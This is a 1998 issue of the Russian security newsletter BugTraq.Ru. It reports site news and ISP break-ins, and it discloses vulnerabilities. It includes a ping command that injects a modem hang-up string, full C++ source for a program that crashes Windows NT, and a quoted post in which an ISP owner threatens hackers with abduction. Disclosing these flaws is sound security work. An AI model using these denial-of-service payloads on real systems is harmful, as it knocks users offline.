BugTraq.Ru: #43

29 сентября 1998, #43

Для начала не удержусь от того, чтобы немного похвастать тем новым, что появилось за последнюю неделю на сервере.

Новое голосование на тему "Что вы считаете хакерством ?" было запущено в Форуме чуть раньше, но объявить я об этом в прошлый раз забыл, так что исправляюсь. На доске объявлений появился поиск. Дело свое он делает, но работает нешустро.

Очередной раз обновился дизайн. Главная страница стала полегче на десяток килобайт, меню поменьше и заметней. Заодно появилась возможность добавлять новые разделы без боязни спрятать их от посетителей с низким разрешением. Это удачно совпало с выкладыванием в online материалов бумажной HackZone (кстати, подписка на нее еще идет) и позволило включить их в общую структуру сайта.

Раз уж заговорили о дизайне. Тут возник небольшой спор. Дело в том, что на большинстве страниц сайта в таблице стилей стоит font-family: sans-serif, рекомендованный еще в CSS level 1 в качестве "generic family name" для шрифтов без засечек. А дальше как бы дело броузера, какой шрифт для этого подставлять - Arial, Verdana, Helvetica и т.д. Учитывая некоторые проблемы из-за <font face="..."> с кириллицей, я всегда предпочитал этот способ, и до недавнего времени все было хорошо. Но тут выяснилось, что по крайней мере у некоторых Mac-пользователей эти страницы выглядят совершенно нечитаемыми. Посему мне очень бы хотелось узнать, есть ли среди наших читателей пользователи не-win платформ (в первую очередь Mac'ов), которым все-таки удается что-нибудь здесь разобрать, и если да, приходилось ли предпринимать для этого какие-то специальные усилия.

Underground будет понемногу менять свой вид, уходя от состояния теперешней свалки. Пока же там добавилось два подраздела - Exploits и 0utf|re stuff, подготовленные 0utf|re.

Из самых последних добавлений - статья, посвященная недавнему взлому украинского Релкома, написанная одним из непосредственных участников этого мероприятия. Будете смеяться, но без Back Orifice и тут не обошлось...

Свежая атака на NT. Берутся две NT, и первой шлется сообщение об ошибке RPC с поддельным обратным адресом от второй. Первая NT отвечает второй REJECT, та отвечает тем же и т.д. Fix доступен. Атаке подвержены NTWS 4.0, NTS4.0, NTS4.0, Terminal Server Edition.

На днях в BugTraq обсуждалась реинкарнация старой DoS атаки на модемы. Идея в следующем. По умолчанию в большинстве модемов код для перехода в командный режим - три "+". Таким образом, если вам удастся заставить модем жертвы передать последовательность +++ATH0, модем честно положит трубку. И ничего не изменится, если он встретит данную последовательность в передаваемом пакете. Простейший вариант использования - взять ping, поддерживающий опцию -p (позволяющую указать, какими данными заполнить пакет) и дать команду ping -p 2b2b2b415448300d <ip жертвы>. Можно попробовать подключиться к sendmail, ftp-серверу и т.п. (если на ввод имени +++ATH0 ftp-сервер ответит что-то типа "331 Password required for +++ATH0", дело сделано).

ATH0 - это еще цветочки. Собственно, никто не помешает послать код и поизощренней - например, AT&N1&W. Как вам такая перспектива ? WinNuke отдыхает.

Некоторые модемы (такие как модемы от USR - вот вам, кстати, новая прошивка с АОН'ом с сайта Russian Team USR) требуют примерно секундной паузы до и после +++, так что использовать против них эту атаку не удастся. Несчастным владельцам других модемов остается заменить управляющий символ на какой-нибудь другой (S2=код до 128), либо отменить переход в командный режим (S2=код от 128 до 255). Т.е. достаточно добавить в строчку инициализации модема S2=255.

Интересно происхождение атаки. Если верить одному из писем, в давние-давние времена, когда стандарты на модемы еще только формировались, Hayes запатентовала свой метод передачи escape-последовательностей, который помимо прочего включал в себя ту самую секундную задержку вокруг +++. Другие производители, не желая платить отчисления Hayes, просто опускали эту деталь в своих реализациях как ненужную. После этого обиженная Hayes стала распространять свои пресс-релизы и прочие документы с символами +++ATH0 в заголовке, стремясь продемонстрировать, что только ее модемам можно доверять. Понемногу производители других модемов обзавелись лицензиями, история эта стала понемногу забываться, и вот через семь лет выплыла в новом виде...

С некоторым удивлением я выяснил, что оказывается за все это время практически ничего не писал в обзорах о Network Security Page, созданной Евгением Ильченко. Исправляю сие досадное упущение.

Насколько я понимаю, главный раздел сайта - Информация по защите сетей. Представлено большое количество материалов по сетевой безопасности - оригинальные, переводные и англоязычные статьи. И не только по защите. Некоторые названия навскидку: "Советы по защите Вашей системы после того, как она была взломана", "Как остаться администратором, взломав систему", "Искусство сканирования портов".

В отдельный раздел выделены материалы по безопасности NetWare. Статьи, файлы, ссылки. Рекомендуется для обязательного посещения всем администраторам NetWare.

Раздел Download - некоторые hot-fix'ы, wordlist'ы, ломалки паролей, сканеры. Здесь же - сетевой сканер автора сайта.

Последнее время сайт обновляется практически каждый день, так что заходите почаще...

Кстати об украинских провайдерах. Сергей Пустовойтов поделился подборкой сообщений из конференции ukr.nodes.

From: Ivan Turuk
Newsgroups: ukr.nodes
Organization: Monolit
Subject: UkrHack!
Date: Mon, 28 Sep 1998 10:18:08 +0300
Добрый день.
Вот решил я в субботу (вернее в 1:00 с субботы на воскресенье) сходить на сервер К.И.С.С.
И как вы думаете что я там увидел? А увидел я там уведомление о том, что "HACKED BY KHG W0W0W0W0W0W0W0W0 lAMERAM nazlo..." Весело... Сначала Релком, теперь Лакинет. Кто следующий?
Хотелось бы узнать по подробнее о расследовании предпринятом сотрудниками ЛакиНет.
С миру по нитке, глядишь и вычислим уродов.

--
Have a nice day,
Ivan Turuk.

From: Sergey Gulchuck
Newsgroups: ukr.nodes
Subject: UkrHack!
Date: 28 Sep 1998 20:39:19 GMT
Organization: Lucky Net Ltd.
Мы полностью изменили ОТНОШЕНИЕ к security. Не буду говорить о технических решениях, абсолютно очевидно, что некий народец не успокоится и рано или поздно будет пойман. При встрече с любым из этих КАЗЛОВ САБЛЕЗУБЫХ я, в частности, взыщу с него зарпалту всех ребят, которые это время зaнимались только security.

Goo
p.s. Я разозлился :-|

From: Sergey Gulchuck
Newsgroups: ukr.nodes
Subject: Re: UkrHack!
Date: 28 Sep 1998 21:16:49 GMT
Organization: Lucky Net Ltd.
Проблема взлома первый раз перед нами встала около года назад. Тогда передо мной встал выбор - или разобраться с идиотами им понятными методами, либо обратиться к государству. Я выбрал второе, и на то было несколько причин:
- создание прецедента, новой культуры, новых отношений
- нежелание сражаться оружием, в котором я заведомо сильнее
- вера в государственные органы
Возможно, я и ошибся, когда ЛакиНет подало докуметы в суд... Бумагооборот идет до сих пор, с периодической надеждой, с вмешательством прокуратуры, с кучей экспертизы. Возможно, результат (срок) и будет. Однако все недопустимо медленно и пока безрезультатно, обобщенное мнение органов - кто-то нарушил правила в какой-то игре, нам непонятной. Да, игра на деньги, но не дело милиции в этом разби- раться. :(
Нас сломал киевлянин. Много ума не надо - читать списки рассылки и успеть применить ерунду раньше, чем поставят защиту.
Я знаю пять-десять человек из этого круга, возможно, не знаю того, кто взломал.
В случае МИНИМАЛЬНОЙ попытки взлома ЛакиНет - я организую, этих людей поодиночке вывезут в лес между Киевом и Житомиром, без всякого членовредительства, с вывернутыми карманами, без копейки, оставят добираться домой. Может, они и не виноваты - Я РАЗОЗЛИЛСЯ.
А там будет видно. "Заложники" знают, о ком я.

Goo

Упоминаемый K.I.S.S. имеет адрес http://www.kiss.kiev.ua. Если найдутся очевидцы, случайно сохранившие эту страницу, просьба поделиться.

Ищутся и очевидцы взлома http://www.rostextile.ru/ в эти выходные. Сайт скорее всего имел такой вид, сейчас он недоступен.

Сообщение, не нуждающееся в особых комментариях.

Msg : 1 of 1 SU.WINDOWS.NT.PROG
From : Dmitry Shepeta 2:5030/212.71 Пят 25 Сен 98 23:41
To : All
Subj : The small program, which kills NT :((((((((((((((((((((((((
Hello All!
Вот очеpедной баг в NT. Hиже пpиведен код после запуска котоpого NT падает в синий экpан. Так что пеpенос части User и GDI в kernel mode еще долго будет аукаться :((((((((((((.
Соответствующие письма я послал на NTBUGTRAQ и в Microsoft. Больше всего MS огоpчило то, что падает и Terminal Server пpи запуске пpоги с remote consol'и. Обещают в скоpом вpемени выпустить hotfix. Как они заявили "... it is a very high priority for Terminal Server."
//////////////begin bug.cpp//////////////// #include <windows.h> int WINAPI WinMain(HINSTANCE hinstExe, HINSTANCE hinstPrev, LPSTR lpszCmdLine, int nCmdShow) { HMENU hMenu = CreatePopupMenu(); HMENU hMenu1 = CreatePopupMenu(); AppendMenu(hMenu1,MF_STRING, 1, "1"); AppendMenu(hMenu1,MF_STRING, 2, "2"); AppendMenu(hMenu1,MF_STRING, 3, "3"); InsertMenu(hMenu,1,MF_POPUP|MF_STRING,(UINT)hMenu1,"1"); InsertMenu(hMenu,2,MF_POPUP|MF_STRING,(UINT)hMenu1,"2"); InsertMenu(hMenu,3,MF_POPUP|MF_STRING,(UINT)hMenu1,"3"); InsertMenu(hMenu,4,MF_POPUP|MF_STRING,(UINT)hMenu1,"4"); InsertMenu(hMenu,5,MF_POPUP|MF_STRING,(UINT)hMenu1,"5"); InsertMenu(hMenu,6,MF_POPUP|MF_STRING,(UINT)hMenu1,"6"); return 0; } ////////////end bug.cpp////////////////

Можно удалить из кода 3 стpоки:
AppendMenu(hMenu1,MF_STRING, 3, "3"); InsertMenu(hMenu,5,MF_POPUP|MF_STRING,(UINT)hMenu1,"5"); InsertMenu(hMenu,6,MF_POPUP|MF_STRING,(UINT)hMenu1,"6");

в этом случае NT будет падать в 90%.
А с виду такая безобидная пpога :)
Dmitry

... Пока одни докапываются до коpней, дpугие успевают дотянуться до плодов!
--- GoldED/Win32 2.50+
* Origin: Dum spiro spero (shep@vika.usr.saai.ru) & (2:5030/212.71)

Могу лишь добавить, что лично у меня эта программа вызывает не синий экран, а перезагрузку системы, что впрочем сути дела не меняет. Желающие проверить, а также посмотреть, влияет ли этот баг на Win'9x, могут забрать ее в скомпилированном виде здесь.

Еще один process viewer (автор - Igor Nys), Показывает потоки, память, пути к dll, подключает отладчик, позволяет менять приоритет задачи, работает под 95 и NT. Дополнительная информация - здесь, раздел "Products and free Downloads".

В последнем выпуске Slonopotam-News - информация о халявном доступе к IBM.NET и работе с SSL через прокси, где искать троянцев в Win и др.

На прошедшей неделе радовал новостями InfoArt. Ссылками поделились Валерий Бикбулатов и Maksym Makar:

У вас есть новость или ссылка, заслуживающие внимания наших читателей ? Пишите.

« »